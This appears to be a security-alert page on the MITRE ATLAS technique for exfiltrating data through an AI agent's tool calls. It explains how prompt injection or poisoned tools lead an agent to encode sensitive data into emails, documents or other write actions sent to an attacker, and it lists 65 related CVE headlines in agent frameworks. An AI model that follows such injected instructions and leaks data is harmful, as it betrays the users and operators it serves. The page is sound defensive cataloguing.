AI Threat Alert
ATLAS Landscape
AML.T0086
Exfiltration via AI Agent Tool Invocation
AI agent tools capable of performing write operations may be invoked to exfiltrate data to an adversary. Sensitive information can be encoded into the tool's input parameters and transmitted to an adversary-controlled location (such as an inbox, document, or server) as part of a seemingly legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or even generating media such as images or videos. The invoked tool itself may be legitimate but invoked by an adversary via [LLM Prompt Injection](/techniques/AML.T0051), or the tool may be malicious (See [AI Agent Tool Poisoning](/techniques/AML.T0110). [AI Agent Tool Poisoning](/techniques/AML.T0110) can also be used manipulate the inputs and destination of a separate legitimate tool, invoked through normal usage by the victim.
65 CVEs mapped
View on MITRE ATLAS →
| Severity | CVE | Headline | Package | CVSS |
|---|---|---|---|---|
| CRITICAL | CVE-2025-2828 | LangChain RequestsToolkit: SSRF exposes cloud metadata | langchain | 10.0 |
| CRITICAL | CVE-2026-25053 | n8n: Command Injection enables RCE | n8n | 9.9 |
| CRITICAL | CVE-2025-61913 | Flowise: path traversal in file tools leads to RCE | flowise | 9.9 |
| CRITICAL | CVE-2026-25592 | semantic-kernel: Path Traversal enables file access | semantic-kernel | 9.9 |
| CRITICAL | CVE-2025-46059 | LangChain GmailToolkit: indirect prompt injection to RCE | 9.8 | |
| CRITICAL | CVE-2026-2654 | smolagents: SSRF allows internal network access | smolagents | 9.8 |
| CRITICAL | CVE-2024-7042 | LangChainJS: prompt injection enables full graph DB takeover | langchain | 9.8 |
| CRITICAL | CVE-2026-25130 | cai-framework: Command Injection enables RCE | 9.7 | |
| CRITICAL | GHSA-2763-cj5r-c79m | PraisonAI: RCE via shell injection in agent workflows | PraisonAI | 9.7 |
| CRITICAL | CVE-2026-28451 | OpenClaw: SSRF via Feishu extension exposes internal services | openclaw | 9.3 |
| CRITICAL | CVE-2026-27825 | mcp-atlassian: Path Traversal enables file access | mcp-atlassian | 9.1 |
| CRITICAL | GHSA-8x8f-54wf-vv92 | PraisonAI: auth bypass enables browser session hijack | PraisonAI | 9.1 |
| HIGH | GHSA-qwgj-rrpj-75xm | PraisonAI: hardcoded approval bypass enables RCE | PraisonAI | 8.8 |
| HIGH | CVE-2026-27498 | n8n: Code Injection enables RCE | n8n | 8.8 |
| HIGH | GHSA-cwj3-vqpp-pmxr | openclaw: Model bypasses authz to persist unsafe config | openclaw | 8.8 |
| HIGH | CVE-2025-66404 | mcp-server-kubernetes: Command Injection enables RCE | 8.8 | |
| HIGH | CVE-2026-44552 | open-webui: Redis cache poisoning enables cross-instance tool hijack | open-webui | 8.7 |
| HIGH | GHSA-gqqj-85qm-8qhf | paperclipai: connector trust bypass enables Gmail read/write | paperclipai | 8.7 |
| HIGH | CVE-2026-34954 | praisonaiagents: SSRF leaks cloud IAM credentials | praisonaiagents | 8.6 |
| HIGH | GHSA-4ggg-h7ph-26qr | n8n-mcp: authenticated SSRF leaks cloud metadata | n8n-mcp | 8.5 |
| HIGH | CVE-2026-42449 | n8n-mcp: SSRF bypass via IPv6 leaks API keys | n8n-mcp | 8.5 |
| HIGH | CVE-2026-39974 | n8n-MCP: SSRF exposes cloud metadata via MCP headers | 8.5 | |
| HIGH | CVE-2026-35394 | mobile-mcp: intent injection enables device control via AI agent | 8.3 | |
| HIGH | GHSA-8g7g-hmwm-6rv2 | n8n-mcp: path traversal + SSRF exposes n8n API keys | n8n-mcp | 8.3 |
| HIGH | CVE-2026-33989 | @mobilenext/mobile-mcp: path traversal via AI agent tool | 8.1 | |
| HIGH | GHSA-x462-jjpc-q4q4 | praisonaiagents: CORS bypass enables silent agent RCE | praisonaiagents | 8.1 |
| HIGH | CVE-2026-40150 | PraisonAIAgents: SSRF exposes cloud metadata via web_crawl | praisonaiagents | 7.7 |
| HIGH | CVE-2026-26321 | OpenClaw: path traversal enables local file exfiltration | openclaw | 7.5 |
| HIGH | CVE-2026-40153 | praisonaiagents: env var expansion exposes production secrets | praisonaiagents | 7.4 |
| HIGH | GHSA-w8hx-hqjv-vjcq | Paperclip: RCE via workspace runtime command injection | @paperclipai/server | 7.3 |
| HIGH | CVE-2026-40114 | PraisonAI: unauthenticated SSRF via unvalidated webhook_url | PraisonAI | 7.2 |
| MEDIUM | CVE-2026-43901 | wireshark-mcp: path traversal enables arbitrary file write via MCP | 6.8 | |
| MEDIUM | CVE-2026-25631 | n8n: Input Validation flaw enables exploitation | n8n | 6.5 |
| MEDIUM | CVE-2026-25475 | OpenClaw: path traversal enables arbitrary file read | openclaw | 6.5 |
| MEDIUM | CVE-2026-40117 | PraisonAI: arbitrary file read via unguarded skill tool | praisonaiagents | 6.2 |
| MEDIUM | CVE-2026-6011 | OpenClaw: SSRF via web-fetch enables internal network pivot | openclaw | 5.6 |
| MEDIUM | GHSA-ffp3-3562-8cv3 | PraisonAI: tool approval bypass leaks env credentials | praisonaiagents | 5.5 |
| MEDIUM | CVE-2025-68697 | n8n: security flaw enables exploitation | n8n | 5.4 |
| MEDIUM | CVE-2026-27795 | LangChain: SSRF allows internal network access | 4.1 | |
| HIGH | GHSA-mr34-9552-qr95 | openclaw: path traversal leaks files and NTLM credentials | openclaw | — |
| UNKNOWN | CVE-2025-34072 | Slack MCP: zero-click exfiltration via link unfurling | — | |
| UNKNOWN | CVE-2026-2286 | CrewAI: SSRF via unvalidated RAG tool URLs exposes internal services | — | |
| UNKNOWN | CVE-2026-2285 | CrewAI: arbitrary file read via JSON loader tool | — | |
| MEDIUM | CVE-2026-34451 | anthropic-ai/sdk: memory tool path traversal escape | @anthropic-ai/sdk | — |
| CRITICAL | CVE-2026-35615 | PraisonAI: path traversal exposes full filesystem via agent tools | PraisonAI | — |
| MEDIUM | GHSA-846p-hgpv-vphc | OpenClaw: path traversal → host file exfiltration via QQ Bot | openclaw | — |
| HIGH | GHSA-qx8j-g322-qj6m | OpenClaw: unsafe body replay on cross-origin redirect | openclaw | — |
| MEDIUM | GHSA-w8g9-x8gx-crmm | OpenClaw: SSRF bypass via Playwright redirect handling | openclaw | — |
| LOW | GHSA-5fc7-f62m-8983 | OpenClaw: local file read bypasses workspace policy | openclaw | — |
| MEDIUM | GHSA-3fv3-6p2v-gxwj | openclaw: SSRF bypass in QQ Bot media fetch paths | openclaw | — |
| MEDIUM | GHSA-vr5g-mmx7-h897 | OpenClaw: SSRF bypass via interaction-triggered navigation | openclaw | — |
| MEDIUM | GHSA-qqq7-4hxc-x63c | openclaw: local file exfiltration via trusted MEDIA refs | openclaw | — |
| HIGH | CVE-2026-40160 | praisonaiagents: SSRF in web_crawl exposes cloud metadata | praisonaiagents | — |
| HIGH | GHSA-28g4-38q8-3cwc | Flowise: Cypher injection allows full Neo4j DB wipe | flowise-components | — |
| MEDIUM | GHSA-qqvm-66q4-vf5c | Flowise: SSRF bypass enables cloud credential theft | flowise-components | — |
| UNKNOWN | CVE-2026-44694 | n8n-MCP: SSRF allows internal network access via webhook tools | n8n-mcp | — |
| HIGH | CVE-2026-44335 | praisonaiagents: SSRF via URL parser confusion bypass | praisonaiagents | — |
| LOW | CVE-2026-44220 | ciguard: symlink traversal exposes secrets via MCP agent | — | |
| MEDIUM | GHSA-55cf-xx38-4p9p | OpenClaw: .env injection redirects connector endpoints | openclaw | — |
| MEDIUM | GHSA-gfg9-5357-hv4c | openclaw: path traversal exposes host files via audio embed | openclaw | — |
| UNKNOWN | CVE-2026-42226 | n8n: IDOR exposes cross-user API key exfiltration | n8n | — |
| UNKNOWN | CVE-2026-42233 | n8n: SQL injection in Oracle node allows data exfiltration | n8n | — |
| UNKNOWN | CVE-2026-42237 | n8n: SQL injection in Snowflake/MySQL nodes bypasses fix | n8n | — |
| LOW | GHSA-c4qg-j8jg-42q5 | openclaw: SSRF in QQBot media upload bypasses validation | openclaw | — |
| UNKNOWN | CVE-2026-41274 | Flowise: Cypher injection via GraphCypherQAChain node | flowise | — |